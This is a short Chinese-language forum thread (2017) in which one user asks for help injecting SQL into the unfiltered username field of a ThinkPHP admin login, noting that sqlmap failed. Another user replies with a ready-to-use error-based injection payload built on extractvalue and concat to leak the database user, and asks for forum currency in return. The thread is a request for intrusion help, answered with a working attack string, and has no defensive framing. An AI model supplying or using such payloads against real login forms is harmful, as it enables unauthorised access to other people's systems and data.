xiaomm 发表于 2017-8-5 11:06:15

注入求助,SELECT * FROM `dd_admin` WHERE ( username='admin'' ) LIMIT 1

thinkphp框架,后台登陆username未过滤,SELECT * FROM `dd_admin` WHERE ( username='admin'' ) LIMIT 1,sqlmap也无法注入,求大神!

w2015 发表于 2017-8-5 11:06:16

')and extractvalue(1,concat(0x7e,user()))%23   
ko. i币转来吧!
页: [1]
查看完整版本: 注入求助,SELECT * FROM `dd_admin` WHERE ( username='admin'' ) LIMIT 1